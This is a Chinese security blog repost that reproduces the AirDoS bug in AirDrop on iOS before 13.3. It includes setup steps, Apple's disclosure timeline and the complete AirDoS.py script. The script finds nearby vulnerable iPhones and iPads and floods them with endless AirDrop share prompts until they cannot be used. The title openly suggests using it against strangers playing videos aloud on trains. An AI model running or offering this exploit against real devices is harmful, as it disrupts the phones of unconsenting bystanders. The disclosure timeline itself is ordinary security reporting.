微慑信息网

IOS-AirDrop-Dos复现[专治高铁上抖音外放之人

喵喵喵

 

这个vuln还是很有意思,居家旅行必备!

先看一下原作者怎么说的.

https://kishanbagaria.com/airdos/ [自己看去]

行了看完了🐣🐣🐣 简言之,就是别人的iPhone或者ipad在允许所有人传送文件给他时,就可以利用这个漏洞进行XXOO,要求系统版本低于13.3,我就是闲的没事不升级的. poc地址:https://github.com/KishanBagaria/AirDoS/blob/master/AirDoS.py

测试环境:

IPadPro 13.2

测试前记得

  1. Usage
  2. Run
  3. brew install libarchive [email protected].1
  4. if not already installed
  5.  
  6.  
  7. Set environment variables:
  8.  
  9. export LIBARCHIVE=/usr/local/opt/libarchive/lib/libarchive.dylib
  10. export LIBCRYPTO=/usr/local/opt/[email protected].1/lib/libcrypto.dylib
  11.  
  12. Run pip3 install -r requirements.txt
  13.  
  14. Run python3 AirDoS.py

我的成果图

IOS-AirDrop-Dos复现[专治高铁上抖音外放之人

 

IOS-AirDrop-Dos复现[专治高铁上抖音外放之人

漏洞复现视频

 

 

漏洞Timeline

2019-08-19:报告已发送给苹果

2019-10-03:要求更新

2019-10-03:苹果回复:“我们仍在调查此问题。如果我们确定我们的产品受到影响,就可以为我们的客户准备安全更新。”

2019年11月14日:苹果公司通过电子邮件发送了电子邮件:“我们将在即将到来的安全更新中以缓解的方式解决您报告的问题,希望您对我们最新的iOS 13.3 Beta进行测试确定是否解决了该问题。收到CVE,我们希望在安全咨询中公开承认您的协助。”

2019-11-15:我答复苹果这个漏洞已在iOS 13.3 beta 2中修复,并询问何时可以公开披露

2019-11-15:苹果回答:“如果您可以在安全更新发布给我们的客户之前不公开讨论此问题,我们将不胜感激。该安全更新当前计划于2019年12月中旬进行。”

2019-12-10:iOS 13.3发布安全公告,已发布并公开披露

 

原文始发于微信公众号(RedTeamWing):IOS-AirDrop-Dos复现[专治高铁上抖音外放之人

拓展阅读(点评/知识):

#!/usr/bin/env python3
"""
AirDoS by Kishan Bagaria
https://kishanbagaria.com/airdos/
"""

import ipaddress
import json
import logging
import plistlib
import random
import threading

from colorama import Fore, Back, Style

from opendrop.client import AirDropBrowser, AirDropClient
from opendrop.config import AirDropConfig, AirDropReceiverFlags

start_new_lines = '\n' * 10
end_new_lines = '\n' * 100
SENDER_NAME = 'Attacker 😈'
FILE_NAME = f"""
{start_new_lines}
⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️
😈😈😈😈😈
You can no longer use this device
Go outside and play!
⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️
{end_new_lines}
😈
"""

rand = lambda: '{0:0{1}x}'.format(random.randint(0, 0xffffffffffff), 12)
attack_counts = {}
config = AirDropConfig()
logger = logging.getLogger(__name__)

logging.basicConfig(level=logging.INFO, format=f'{Style.DIM}%(asctime)s{Style.RESET_ALL} %(message)s')

def get_os_version(discover):
    try:
        receiver_media_cap = json.loads(discover['ReceiverMediaCapabilities'])
        return receiver_media_cap['Vendor']['com.apple']['OSVersion']
    except:
        pass

def get_is_mac(os_version):
    if os_version:
        if os_version[0] == 10 and os_version[1] >= 7:
            return True
    return False

def get_is_vuln(os_version):
    if os_version:
        if (os_version[0] == 13 and os_version[1] >= 3) or os_version[0] >= 14:
            return False
    return True

def send_ask(node_info):
    ask_body = {
        'SenderComputerName': SENDER_NAME,
        'SenderModelName': rand(),
        'SenderID': rand(),
        'BundleID': 'com.apple.finder',
        'Files': [{
            'FileName': FILE_NAME,
            'FileType': 'public.plain-text'
        }]
    }
    ask_binary = plistlib.dumps(ask_body, fmt=plistlib.FMT_BINARY)
    id = node_info['id']
    attack_counts[id] = attack_counts.get(id, 1) + 1
    try:
        client = AirDropClient(config, (node_info['address'], node_info['port']))
        success, _ = client.send_POST('/Ask', ask_binary)
        if success: # if user accepted
            client.send_POST('/Upload', None)
        return success
    except:
        pass

def send(node_info):
    name = node_info['name']
    id = node_info['id']
    attack_count = attack_counts.get(id, 1)
    receiver_name = Fore.GREEN + name + Fore.RESET
    logging.info(f'❔ Prompting   {receiver_name} (#{attack_count})')
    success = send_ask(node_info)
    if success == True:
        logging.info(f'✅ Accepted by {receiver_name} (#{attack_count})')
    elif success == False:
        logging.info(f'❎ Declined by {receiver_name} (#{attack_count})')
    else:
        logging.info(f'🛑 Errored     {receiver_name} (#{attack_count})')
    return success

def brute(node_info):
    error_count = 0
    while True:
        if send(node_info) == None:
            error_count += 1
            if error_count > 2:
                break

def start_brute(node_info):
    # two threads just for good measure
    # this makes sure there is always another popup to decline if there is any network delay
    for i in range(2):
        thread = threading.Thread(target=brute, args=(node_info,))
        thread.start()

def found_receiver(info):
    thread = threading.Thread(target=on_receiver_found, args=(info,))
    thread.start()

def send_discover(client):
    discover_body = {}
    discover_plist_binary = plistlib.dumps(discover_body, fmt=plistlib.FMT_BINARY)
    success, response_bytes = client.send_POST('/Discover', discover_plist_binary)
    response = plistlib.loads(response_bytes)
    return response

def on_receiver_found(info):
    try:
        address = ipaddress.ip_address(info.address).compressed
    except ValueError:
        return
    id = info.name.split('.')[0]
    hostname = info.server
    port = int(info.port)
    client = AirDropClient(config, (address, int(port)))
    flags = int(info.properties[b'flags'])

    receiver_name = None
    if flags & AirDropReceiverFlags.SUPPORTS_DISCOVER_MAYBE:
        try:
            discover = send_discover(client)
            receiver_name = discover.get('ReceiverComputerName')
            os_version = get_os_version(discover)
        except:
            pass
    discoverable = receiver_name is not None

    node_info = {
        'name': receiver_name,
        'address': address,
        'port': port,
        'id': id,
        'flags': flags,
        'discoverable': discoverable,
    }
    if discoverable:
        os_v = '.'.join(map(str, os_version)) if os_version else ''
        is_mac = get_is_mac(os_version)
        is_vuln = get_is_vuln(os_version)
        additional = f'{Style.DIM}{id} {hostname} [{address}]:{port}{Style.RESET_ALL}'
        if is_mac:
            logger.info('❌ Ignoring    {:32} macOS {:>7} {}'.format(Fore.YELLOW + receiver_name + Fore.RESET, os_v, additional))
        elif not is_vuln:
            logger.info('❌ Ignoring    {:32} iOS   {:>7} {}'.format(Fore.RED + receiver_name + Fore.RESET, os_v, additional))
        else:
            logger.info('🔍 Found       {:32} iOS   {:>7} {}'.format(Fore.GREEN + receiver_name + Fore.RESET, os_v, additional))
            start_brute(node_info)


logger.info('⏳ Looking for devices... Open Finder -> AirDrop')
browser = AirDropBrowser(config)
browser.start(callback_add=found_receiver)
try:
    input()
except KeyboardInterrupt:
    pass
finally:
    if browser is not None:
        browser.stop()

 

本文标题:IOS-AirDrop-Dos复现[专治高铁上抖音外放之人
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2019/1212_9639.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » IOS-AirDrop-Dos复现[专治高铁上抖音外放之人
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们